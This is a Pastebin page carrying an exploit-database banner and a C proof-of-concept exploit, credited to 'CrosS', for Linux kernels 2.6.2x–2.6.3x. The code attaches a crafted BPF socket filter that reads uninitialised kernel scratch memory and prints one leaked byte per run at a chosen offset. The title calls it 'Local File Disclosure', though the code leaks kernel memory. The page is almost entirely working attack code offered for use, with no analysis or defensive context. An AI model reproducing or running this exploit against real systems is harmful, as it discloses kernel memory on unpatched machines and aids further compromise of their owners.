Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
- 0 _ __ __ __ 1
- 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
- 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
- 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
- 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
- 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
- 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
- 1 \ \____/ >> Exploit database separated by exploit 0
- 0 \/___/ type (local, remote, DoS, etc.) 1
- 1 0
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
- /*
- * Local File Disclosure
- * Linux Kernel 2.6.2* - 2.6.3*
- * By > CrosS
- * Greetz > r0073r , r4dc0re , Side^effects(1337day.com)
- * Ataman , S4(uR4 , Xenu , kokoko(r00tw0rm.com)
- /
- #include <string.h>
- #include <stdio.h>
- #include <netinet/in.h>
- #include <sys/socket.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <linux/filter.h>
- #define PORT 37337
- int transfer(int sendsock, int recvsock)
- {
- struct sockaddr_in addr;
- char buf[512];
- int len = sizeof(addr);
- memset(buf, 0, sizeof(buf));
- if (fork())
- return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)&addr, &len);
- sleep(1);
- memset(&addr, 0, sizeof(addr));
- addr.sin_family = AF_INET;
- addr.sin_port = htons(PORT);
- addr.sin_addr.s_addr = inet_addr("127.0.0.1");
- sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len);
- exit(0);
- }
- int main(int argc, char * argv[])
- {
- int sendsock, recvsock, ret;
- unsigned int val;
- struct sockaddr_in addr;
- struct sock_fprog fprog;
- struct sock_filter filters[5];
- if (argc != 2) {
- printf("[*] Usage: %s offset (0-63)\n", argv[0]);
- return -1;
- }
- val = atoi(argv[1]);
- if (val > 63) {
- printf("[*] Inv4liD by7e oFfs3t (must be 0-63)\n");
- return -1;
- }
- recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
- sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
- if (recvsock < 0 || sendsock < 0) {
- printf("[*] CoulD no7 Cre4t3 soCke7s.\n");
- return -1;
- }
- memset(&addr, 0, sizeof(addr));
- addr.sin_family = AF_INET;
- addr.sin_port = htons(PORT);
- addr.sin_addr.s_addr = htonl(INADDR_ANY);
- if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
- printf("[*] CoulD no7 biNd soCke7.\n");
- return -1;
- }
- memset(&fprog, 0, sizeof(fprog));
- memset(filters, 0, sizeof(filters));
- filters[0].code = BPF_LD|BPF_MEM;
- filters[0].k = (val & ~0x3) / 4;
- filters[1].code = BPF_ALU|BPF_AND|BPF_K;
- filters[1].k = 0xff << ((val % 4) * 8);
- filters[2].code = BPF_ALU|BPF_RSH|BPF_K;
- filters[2].k = (val % 4) * 8;
- filters[3].code = BPF_ALU|BPF_ADD|BPF_K;
- filters[3].k = 256;
- filters[4].code = BPF_RET|BPF_A;
- fprog.len = 5;
- fprog.filter = filters;
- if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)) < 0) {
- printf("[*] F41leD 7o 1nstaLl fiLteR y0u m0f0 h3aD.\n");
- return -1;
- }
- ret = transfer(sendsock, recvsock);
- printf("[*] Your byte: 0x%.02x\n", ret - 248);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement